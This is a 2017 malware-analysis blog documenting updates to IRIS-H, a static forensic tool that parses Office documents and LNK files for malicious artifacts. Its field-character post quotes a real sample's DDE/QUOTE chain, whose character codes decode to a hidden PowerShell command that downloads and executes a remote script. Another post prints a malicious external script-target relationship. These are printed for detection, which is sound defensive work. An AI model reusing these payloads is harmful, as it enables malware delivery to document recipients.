Malware Analysis: The Final Frontier: 2017

Sunday 10 December 2017

IRIS-H (alpha): Added LNK files "Console Data Block" structure parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: A parser for the LNK file "Console Data Block" structure has been added. The parser attempts to extract all relevant data stored in these structures, which hold information about the console window.
Outstanding Tasks: None

Detailed Summary

The IRIS-H Shell Link (.LNK) file parser has been updated to include a data extraction routine for "Console Data Block" structures. The ConsoleDataBlock structure specifies the display settings to use when a link target specifies an application that is run in a console window. Below are some examples of the data stored in these structures:

foreground and background text colors in the console window.
foreground and background text colors in the console window popup.
console window buffer size.
console window size.
console window origin coordinates.
font information.
cursor information.
edit settings.
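
As an illustration of how the first few of these values can be read, here is a minimal sketch in Python (not the IRIS-H code itself). The field offsets follow the ConsoleDataBlock layout in [MS-SHLLINK]; the function name and the returned dictionary keys are made up for this example.

```python
import struct

CONSOLE_BLOCK_SIZE = 0x000000CC       # fixed block size per [MS-SHLLINK]
CONSOLE_BLOCK_SIGNATURE = 0xA0000002  # ConsoleDataBlock signature

def parse_console_data_block(block: bytes) -> dict:
    """Decode the leading fields of a ConsoleDataBlock (hypothetical helper)."""
    if len(block) < CONSOLE_BLOCK_SIZE:
        raise ValueError("block is shorter than a ConsoleDataBlock")
    size, signature = struct.unpack_from("<II", block, 0)
    if size != CONSOLE_BLOCK_SIZE or signature != CONSOLE_BLOCK_SIGNATURE:
        raise ValueError("not a ConsoleDataBlock")

    # Two attribute words followed by six signed 16-bit size/origin values.
    (fill, popup_fill, buf_x, buf_y,
     win_x, win_y, org_x, org_y) = struct.unpack_from("<2H6h", block, 8)
    # FontSize sits after two unused 4-byte fields; the high word is the
    # font height and the low word is the font width.
    (font_size,) = struct.unpack_from("<I", block, 32)
    # FaceName is a 64-byte, null-terminated UTF-16LE string.
    face_name = block[44:108].decode("utf-16-le", errors="replace").split("\x00", 1)[0]

    return {
        "foreground_color": fill & 0x0F,         # low nibble of FillAttributes
        "background_color": (fill >> 4) & 0x0F,  # next nibble of FillAttributes
        "popup_foreground_color": popup_fill & 0x0F,
        "popup_background_color": (popup_fill >> 4) & 0x0F,
        "screen_buffer_size": (buf_x, buf_y),
        "window_size": (win_x, win_y),
        "window_origin": (org_x, org_y),
        "font_height": font_size >> 16,
        "font_width": font_size & 0xFFFF,
        "face_name": face_name,
    }
```

The colour values are indexes into the block's colour table, which this sketch does not decode.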

The screenshot below shows an example of "Console Data Block" data extracted by IRIS-H.

IRIS-H report showing "Console Data Block" data

Full report can be found here - https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e

Monday 27 November 2017

IRIS-H (alpha): Updated LNK file parser / Command line arguments deobfuscation added

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API & UI (clear browser cache for 'iris-h.services' to see the changes)
Short Description: Parser for LNK files has been updated. Command line arguments string deobfuscation and URL extraction code have been added. UI Report page has been updated to display the new data.
Outstanding Tasks: None

Detailed Summary

IRIS-H Shell Link (.LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string. When the command line arguments string is present, the service will attempt the following:

detect environment variable assignments made with the 'set' command
detect environment variable usage marked with the ' ! ' and ' % ' special characters
replace referenced environment variables with their corresponding values
remove the escape characters ' ^ ' and ' ` '
detect and extract URL strings
detect string concatenation operations and perform them
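
The steps above can be sketched roughly as follows. This is a simplified Python illustration, not the IRIS-H implementation: the regular expressions, the function name and the order of the steps are all assumptions, and real-world command lines will need more careful handling.

```python
import re

# All patterns below are simplifying assumptions made for this sketch.
SET_RE = re.compile(r'\bset\s+"?(\w+)=([^&|"]*)', re.IGNORECASE)  # set NAME=value
VAR_RE = re.compile(r'[%!](\w+)[%!]')                             # %NAME% or !NAME!
CONCAT_RE = re.compile(r"""(['"])\s*\+\s*\1""")                   # 'ab'+'cd'
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""", re.IGNORECASE)

def deobfuscate(arguments: str, max_passes: int = 5) -> dict:
    """Apply the listed steps to a command line arguments string."""
    # Remove the escape characters first so split keywords are rejoined.
    text = arguments.replace("^", "").replace("`", "")
    # Collect environment variable assignments made with 'set'.
    variables = {name.lower(): value.strip() for name, value in SET_RE.findall(text)}
    # Expand references; the pass limit guards against circular definitions.
    for _ in range(max_passes):
        expanded = VAR_RE.sub(
            lambda m: variables.get(m.group(1).lower(), m.group(0)), text)
        if expanded == text:
            break
        text = expanded
    # Perform quoted string concatenation: 'ht'+'tp' becomes 'http'.
    text = CONCAT_RE.sub("", text)
    # Extract URLs, dropping duplicates while keeping first-seen order.
    urls = list(dict.fromkeys(URL_RE.findall(text)))
    return {"variables": variables, "deobfuscated": text, "urls": urls}
```

Calling `deobfuscate()` on an arguments string returns the collected variables, the cleaned-up string and any URLs found in it.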

Below is a report example showing the new feature in action.

LNK file analysis results showing deobfuscated command line arguments string and extracted URL

Corresponding report - https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c

More examples can be found here:

https://iris-h.services/report/166127261e36b959e48eece2c1b26185

https://iris-h.services/report/2de846108b26101e3554f5964c1a3576

NOTE
IRIS-H UI changes might not take effect until you clear your browser cache for the iris-h.services website.

Thursday 16 November 2017

IRIS-H (alpha): Updated OOXML 'document' file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: OOXML 'document' file parser has been updated to detect and extract "Drawing Object Non-Visual Properties".
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are specified as child elements of 'docPr' element." - ECMA-376 Part 1 (section 20.4.2.5)

The OOXML 'document' file parser has been updated to extract non-visual object properties associated with inline drawing objects (pictures). The extracted data is displayed in the corresponding 'document' panel under the 'Individual Components' section of the report page. The following properties are considered:

descr - Specifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.
hidden - Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).
name - Specifies the name of the object. Typically, this is used to store the original file name of a picture object.
title - Specifies the title (caption) of the current DrawingML object.
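
For illustration, the four attributes above can be pulled out of a document part with a few lines of Python. This is a sketch rather than the IRIS-H code; the function name is hypothetical, and the namespace is the standard WordprocessingML drawing namespace in which 'docPr' is defined.

```python
import xml.etree.ElementTree as ET

# Namespace of the wp:docPr element.
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
PROPERTIES = ("descr", "hidden", "name", "title")

def extract_docpr_properties(document_xml: str) -> list:
    """Return one dict per docPr element holding only the attributes present."""
    root = ET.fromstring(document_xml)
    results = []
    for doc_pr in root.iter(f"{{{WP_NS}}}docPr"):
        found = {key: doc_pr.attrib[key] for key in PROPERTIES if key in doc_pr.attrib}
        results.append(found)
    return results
```

Attributes missing from an element are left out of its dictionary instead of being reported as empty.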

Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:

'document' panel showing non-visual object properties extracted from inline drawing object

As seen in the screenshot above, these properties might contain digital artifacts that can be helpful in a digital forensics investigation.

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e

IRIS-H (alpha): Added OOXML 'Footer Part' parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API
Short Description: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Footer Part contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-relationship item for the Main Document. Each footer has a corresponding 'ftr' element in a Footer part, which contains the text of the footer." - ECMA-376 Part 1 (section 11.3.6)

A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under 'Individual Components' section on the report page. See an example below:

Example of a Footer Part panel showing extracted text content.

If the extracted content includes special field characters, they are analysed for the presence of blacklisted field character commands. If any are detected, the findings are shown in the 'Malicious Findings' panel on the report page. Below is the corresponding findings panel:

Corresponding findings panel showing detected field character type
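
A rough Python sketch of this kind of footer processing is shown below. It is not the IRIS-H implementation: the function name is hypothetical, and the blacklist contents are an assumption made for the example, since the actual list is not given here.

```python
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
BLACKLISTED_FIELDS = {"DDE", "DDEAUTO"}  # assumed list, for illustration only

def parse_footer(footer_xml: str) -> dict:
    """Collect footer text and field instructions, then flag blacklisted commands."""
    root = ET.fromstring(footer_xml)
    text_parts, instr_parts = [], []
    for node in root.iter():
        if node.tag == f"{{{W_NS}}}t":            # visible text run
            text_parts.append(node.text or "")
        elif node.tag == f"{{{W_NS}}}instrText":  # complex field instruction
            instr_parts.append(node.text or "")
        elif node.tag == f"{{{W_NS}}}fldSimple":  # simple field, instruction in w:instr
            instr_parts.append(" " + node.get(f"{{{W_NS}}}instr", "") + " ")
    # Instructions can be split across runs, so join before tokenising.
    instruction = "".join(instr_parts)
    flagged = sorted({word.upper() for word in instruction.split()} & BLACKLISTED_FIELDS)
    return {"text": "".join(text_parts), "instruction": instruction, "flagged": flagged}
```

Joining the instruction fragments before matching matters because a command name may be deliberately split across several runs.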

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e

Thursday 9 November 2017

IRIS-H (alpha): Added OOXML Relationships file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI (clear browser cache to see the changes)
Short Description: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.
Outstanding Tasks: None

Detailed Summary

"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one or more relationships can have an associated Relationships part. This part holds the list of relationships for the source part." - ECMA-376 Part 2 (section 9.3.3)

Relationships file example

A new parser for OOXML Relationships file has been added to IRIS-H. The parser is configured to read every Relationship in the Relationships file and extract hyperlinks pointed at external sources. See below for an example of a Relationship that will be detected:

<Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" />
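
A minimal Python sketch of this kind of check is shown below. It is an illustration rather than the IRIS-H code; the function name and the shape of the returned records are assumptions.

```python
import xml.etree.ElementTree as ET

# Namespace of the Relationships part as defined by the Open Packaging Conventions.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

def external_targets(rels_xml: str) -> list:
    """Return every Relationship whose TargetMode is 'External'."""
    root = ET.fromstring(rels_xml)
    hits = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        # TargetMode defaults to Internal when the attribute is absent.
        if rel.get("TargetMode", "Internal").lower() == "external":
            hits.append({
                "id": rel.get("Id"),
                "type": rel.get("Type", "").rsplit("/", 1)[-1],
                "target": rel.get("Target"),
            })
    return hits
```

Relationships without a TargetMode attribute are treated as internal and skipped.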

The extracted hyperlinks are displayed in the "Suspicious Findings" panel. See below for an example:

"Suspicious Findings" example showing detected hyperlinks

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97

NOTE
IRIS-H UI changes might not take effect until you clear your browser cache for the iris-h.malwageddon.com website.

Wednesday 8 November 2017

IRIS-H (alpha): Updated Field Characters Parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature improvement
Affected Components: API
Short Description: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.
Outstanding Tasks: None

Detailed Summary

The Field Character extraction and parsing code has been improved to allow decoding of QUOTE command arguments. The change was motivated by McAfee's blog post today, which references an OOXML document used in an APT-type attack. The XML code snippets from the document below show which field characters are used and how they appear in the code.

QUOTE field character usage example

DDE field character and the way its arguments are assembled

Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.

The SET command stores the value produced by the QUOTE command, and that value is later passed to the DDE command through the REF field character. Below is an example:

SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35

The 'c' variable now holds the output of the QUOTE command (a character string built from the array of character codes). Later, 'c' is referenced in the DDE command call as one of its arguments.

DDE REF c

When DDE command is called, the value of 'c' variable will be used as its argument.
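
The SET / QUOTE / REF chain described above can be sketched in a few lines of Python. This is a simplified illustration and not the IRIS-H handler: the function names are hypothetical, and it only covers the flat form shown here (a SET of a QUOTE with decimal character codes, followed by a REF to the variable).

```python
import re

def decode_quote(codes: str) -> str:
    """Turn a whitespace-separated list of decimal character codes into text."""
    return "".join(chr(int(code)) for code in codes.split())

def resolve_fields(instructions: list) -> list:
    """Evaluate 'SET name QUOTE ...' fields and substitute later 'REF name' uses."""
    variables = {}
    resolved = []
    for instruction in instructions:
        match = re.match(r"\s*SET\s+(\w+)\s+QUOTE\s+([\d\s]+)$", instruction, re.IGNORECASE)
        if match:
            variables[match.group(1)] = decode_quote(match.group(2))
            continue
        # Replace 'REF name' with the stored value; unknown names are left as-is.
        resolved.append(re.sub(
            r"\bREF\s+(\w+)",
            lambda ref: variables.get(ref.group(1), ref.group(0)),
            instruction,
            flags=re.IGNORECASE,
        ))
    return resolved

# The first eleven codes from the SET field above, followed by the DDE call.
fields = ["SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115", "DDE REF c"]
print(resolve_fields(fields))
```

Only the first few character codes from the sample are used here to keep the example short.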

The IRIS-H field character handlers have been updated to extract the array of character codes associated with a QUOTE command and decode it. If extraction and decoding succeed, the report page will contain output similar to the example below.

Example of QUOTE command evaluation

This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears when the document is opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text sequence cannot be guaranteed.

Full report can be found here - https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a

Tuesday 7 November 2017

IRIS-H (alpha): Added support for Shell Link (.LNK) files

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.
Outstanding Tasks: Implement support for missing Extra Data Blocks

Detailed Summary

A new binary data parser has been added to the IRIS-H service. It processes Shell Link (.LNK) files and extracts digital artifacts from them. The service now accepts LNK files through the Submission page and can also automatically detect them when they are embedded in submitted documents. In either case, the report page will display the extracted binary data enriched with a human-readable description. The enrichment process references the official Microsoft specification, [MS-SHLLINK] Shell Link (.LNK) Binary File Format.

The parser fully supports the following LNK file structures:

ShellLinkHeader
LinkTargetIDList
LinkInfo
StringData

ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:

EnvironmentVariableDataBlock
KnownFolderDataBlock
SpecialFolderDataBlock
TrackerDataBlock
PropertyStoreDataBlock

Once all binary data is extracted, it is subjected to a rule-based evaluation to conclude whether the submitted or embedded LNK file can be harmful. IRIS-H will also attempt to reconstruct the command line, including any arguments. Below is an example of rule-based evaluation results.

LNK file rule-based evaluation results

A few new sections have been added to the "Informational Findings" panel. The sections display information relevant to the LNK file target: file path, working directory, relative path, command-line arguments, etc. One particular section, "Link Target Tracking", contains the evaluation results for the data stored in the following TrackerDataBlock fields:

Droid Volume Identifier
Droid File Identifier
Birth Droid Volume Identifier
Birth Droid File Identifier

Based on this data, IRIS-H will try to identify if the link target file was moved between the volumes on the original computer or if it was moved to another machine. For more information see page 10 of this PDF. Below is an example of "Informational Findings" view.

LNK file Informational Findings example

"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.

Data derived from TrackerDataBlock
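
As a rough illustration of where this data comes from, the Python sketch below decodes a TrackerDataBlock using the layout in [MS-SHLLINK]. It is not the IRIS-H code: the function name and result keys are made up, and the two "changed" flags are only a simple comparison of the current and birth identifiers, not the service's actual evaluation rules.

```python
import struct
import uuid

TRACKER_BLOCK_SIZE = 0x00000060  # fixed block size per [MS-SHLLINK]
TRACKER_SIGNATURE = 0xA0000003   # TrackerDataBlock signature

def parse_tracker_data_block(block: bytes) -> dict:
    """Decode machine name, droid identifiers and MAC address (hypothetical helper)."""
    if len(block) < TRACKER_BLOCK_SIZE:
        raise ValueError("block is shorter than a TrackerDataBlock")
    size, signature, _length, _version = struct.unpack_from("<IIII", block, 0)
    if size != TRACKER_BLOCK_SIZE or signature != TRACKER_SIGNATURE:
        raise ValueError("not a TrackerDataBlock")

    # MachineID: 16-byte, null-padded NetBIOS name.
    machine_id = block[16:32].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    # Droid and DroidBirth are each two GUIDs: volume identifier, then file identifier.
    droid_volume = uuid.UUID(bytes_le=block[32:48])
    droid_file = uuid.UUID(bytes_le=block[48:64])
    birth_volume = uuid.UUID(bytes_le=block[64:80])
    birth_file = uuid.UUID(bytes_le=block[80:96])

    # Version 1 UUIDs carry the generating host's MAC address in the node field.
    mac = None
    if droid_file.version == 1:
        mac = ":".join(f"{byte:02x}" for byte in droid_file.node.to_bytes(6, "big"))

    return {
        "machine_id": machine_id,
        "droid_volume": str(droid_volume),
        "droid_file": str(droid_file),
        "birth_droid_volume": str(birth_volume),
        "birth_droid_file": str(birth_file),
        "mac_address": mac,
        "volume_changed": droid_volume != birth_volume,
        "file_id_changed": droid_file != birth_file,
    }
```

The MAC address is only reported when the file identifier is a version 1 UUID, since other UUID versions do not embed a node address.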

The ShellLinkHeader section contains time stamps associated with the Link Target, as well as its file attributes, the type of media it resides on (hard disk, USB, network, etc.), the media serial number and even the command line window state. See below for an example.

Data derived from ShellLinkHeader
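
For readers curious about the raw structure, here is a minimal Python sketch that decodes the fixed 76-byte ShellLinkHeader as laid out in [MS-SHLLINK]. It is an illustration only: the function names and result keys are assumptions, and only a handful of the LinkFlags bits are decoded.

```python
import struct
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 0x0000004C
# CLSID 00021401-0000-0000-C000-000000000046 as stored on disk.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}

def filetime_to_datetime(filetime: int):
    """Convert a FILETIME (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    if filetime == 0:
        return None  # zero means the time stamp is not set
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)

def parse_shell_link_header(data: bytes) -> dict:
    """Decode the main ShellLinkHeader fields (hypothetical helper)."""
    if len(data) < HEADER_SIZE:
        raise ValueError("data is shorter than a ShellLinkHeader")
    (size, clsid, flags, attributes, created, accessed, written,
     file_size, icon_index, show_command, hotkey) = struct.unpack_from("<I16sIIQQQIiIH", data, 0)
    if size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    return {
        "has_link_target_id_list": bool(flags & 0x01),
        "has_link_info": bool(flags & 0x02),
        "has_arguments": bool(flags & 0x20),
        "is_unicode": bool(flags & 0x80),
        "file_attributes": attributes,
        "creation_time": filetime_to_datetime(created),
        "access_time": filetime_to_datetime(accessed),
        "write_time": filetime_to_datetime(written),
        "file_size": file_size,
        "icon_index": icon_index,
        # Values other than the three named ones are treated as SW_SHOWNORMAL.
        "show_command": SHOW_COMMANDS.get(show_command, "SW_SHOWNORMAL"),
        "hotkey": hotkey,
    }
```

A show command of SW_SHOWMINNOACTIVE is the "command line window state" that makes a launched console start minimized.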

In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.

Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock

Examples of full reports can be found on the links below:

https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771 - submitted LNK file.

https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.

Thursday 21 September 2017

Announcement: IRIS-H (alpha) - Online Digital Forensic Tool for Microsoft Office Files

Introduction

IRIS-H is an online web service that performs static analysis of files stored in directory-based or strictly structured formats. The service disassembles submitted files into individual components based on the detected file format and performs static analysis of each component. The analysis process involves sequentially reading the components' binary data and enriching it with human-readable information. The enrichment process is based on the binary data description given in the official file format specification. Further rule-based evaluation is performed on the extracted data in order to establish whether the submitted file can be harmful to a computer system.

Disclaimer

Currently, the service is still being developed and running in alpha phase of the release life cycle. Application updates are pushed regularly and may require full data flush. There is absolutely no guarantee the uploaded data and corresponding generated reports will be available during 'alpha' cycle. Any development/maintenance is done in my free time - this service is the result of a hobby rather than a paid job.

Acknowledgements

I'd like to say 'Thank You!' to the following individuals and organizations for their direct and/or indirect support. 👍

VirusTotal crew
StackOverflow ReactJS and NodeJS communities
Decalage
Individual security researchers who provided their invaluable feedback that materialized into improved and new features (I do not support fame leeching, so no names, but you know who you are)

IRIS-H Service

Pre-history

(skip to the next paragraph if you're not into fairy tales and stuff...)
Once upon a time I decided that challenging myself with learning JavaScript flavors is a great idea... well, still think it's a great idea... So, I set out on a quest to build something as I learn it. Looking far and wide, I thought a simple console based digital forensic tool could be a good start. Little did I know at the time how far it would actually take me... and so I ended up creating IRIS-H. The name doesn't really stand for anything with 'Next Generation' or 'Artificial Intelligence' or 'Blockchain' or even 'Cyber' buzz words in mind (sorry, no lasers either), despite having a logo. It's simply my tribute to all the hard working Irish people I've had the pleasure to encounter in my last 20 years living in Ireland.

So, what's it all about?...

I'd like to share an online tool I've been working on for the last few months. IRIS-H is mainly positioned as a digital forensics tool, though it also applies some rule-based logic to determine the outcome of opening the analysed file on a computer system. The digital forensics aspect revolves around attaching descriptive meaning to the binary data derived from the analyzed file. Where possible, the tool attempts to extract digital artifacts to allow for further manual or automated analysis. In the case of malicious file analysis, a trained eye could leverage the tool to help them perform a simple 'campaign' type attribution based on the data derived by the service and their best judgment.

It's important to note that IRIS-H is not a sandbox environment. The submitted file is never opened with its corresponding host application. This slightly limits IRIS-H functionality in terms of obtaining network-based indicators of compromise (IoCs). Still, the service attempts to evaluate the risk of opening the file on a computer system based on the IoCs derived from the binary data and the presence of certain digital artifacts. Sometimes, when you search for a quick answer, this might be all you need.

IRIS-H can do some tricks, but the service is far from being mature. It's at the stage where it just started bringing some value to the work I do, so I hope it can do the same for the others.

Right, what can it do?...

The interaction with the service is done through its web interface. The interface allows for navigation through web pages that offer specific service features.

Home Page - offers the ability to view the latest file submissions. The view uses a table to present the following data: submission time, submitted file MD5 hash, file name at submission time, detected file type and the result of rule-based risk evaluation.

Latest Submissions table view

Search Page - offers the ability to search the service database using MD5, SHA1 or SHA256 hash strings. If a successful analysis already exists for the file with the provided hash, the user is forwarded to the corresponding Report Page (more on this below).

Search Form view

Submit Page - offers the ability to submit a file to be analyzed. File size and type validations are performed on this page. The page provides a 'drag-and-drop', 'no-submit-button' component that lets service users select a file to submit. The upload file size limit is set to 10MB. If the submitted file type is not supported, an alert notifies the user. Only single file submissions are supported at this time. Zipped files are not accepted yet.

Submit Page dropzone box

The following are some examples of what IRIS-H service can handle at this stage:

Files saved in Microsoft Office 97-2003 format (DOC, XLS, PPT) - only DOC files are fully supported at the moment
Files saved in Microsoft Office 2007+ format (DOCX, PPTX) - only DOCX files are fully supported at the moment. XLSX are not being accepted yet.
VBA project files extracted from Microsoft Office documents that are saved in Office Open XML format
Objects embedded into other Microsoft Office documents including those in OOXML format

Technically, IRIS-H will accept and attempt to process any file in OLE-CF format. There are certain case-by-case limitations though, where the service might not have a parser for 'not-so-common' OLE stream types.
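
To give an idea of how a submitted file's container format can be recognised before any parsing starts, here is a small Python sketch. It is only an illustration and not how IRIS-H necessarily does it: the function name and the returned labels are assumptions. The OLE-CF and ZIP signatures are the standard magic bytes for those formats.

```python
import io
import zipfile

OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # OLE Compound File signature
ZIP_MAGIC = b"PK\x03\x04"                      # ZIP local file header signature

def detect_format(data: bytes) -> str:
    """Classify a file as OLE-CF, OOXML, plain ZIP or unknown (hypothetical helper)."""
    if data.startswith(OLE_MAGIC):
        return "OLE-CF"
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                # OOXML packages always carry a [Content_Types].xml part.
                if "[Content_Types].xml" in archive.namelist():
                    return "OOXML"
        except zipfile.BadZipFile:
            pass
        return "ZIP"
    return "unknown"
```

A file that passes the OLE-CF check can still contain stream types for which no parser exists, which is the limitation mentioned above.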

Once a file is accepted and uploaded, IRIS-H begins dissecting the submitted file into separate components for further automated static analysis. When the analysis is completed, the user is forwarded to a corresponding Report Page.

The Report Page is where everything comes together. To help service users navigate through the chunks of information, the page provides a navigation bar.

Left Navigation Bar Example

The information presented on the Report Page is a mixture of high level and 'deep dive' forensics data. The original idea was to be able to export it into a file format that can be stored or shared (like PDF or similar), but due to some technical challenges I couldn't overcome, I made each report available through its URL instead.

Alright, but what's in it for me?...

Well, one would have to try it out and see, right? 😜 IRIS-H service is available at https://iris-h.malwageddon.com/ . Please make sure you familiarize yourself with the Terms of Service. There is also an About page that provides more details about the service.

... but just to give you some ideas, the screenshots below highlight some of the findings I came across using file samples at my disposal.

VBA Digital Signature details

Detection for Microsoft Office field characters

IRIS-H detected embedded VBS script in the submitted file

'deep-dive' digital forensics view of the VBS file reported above.

Results of VBA scripts analysis

Partial view of document embedded form analysis showing UA string hidden in form's tag field

Partial view of document meta data analysis showing URLs stored in the document

'deep-dive' forensics view of a linked object showing object's name and network path where it's stored

'deep-dive' forensics view of data from WordDocument stream showing Revision History, System Fonts and Users data

Example of Extracted Images preview

Example of findings view showing evidence of a linked ZIP file from the document

Example of extracted downloadable artifact (VBA macro script in this case)

Closing Note

If you have any feedback, please do not hesitate to reach out. I believe there is no better way to improve something than to hear what people think about it.
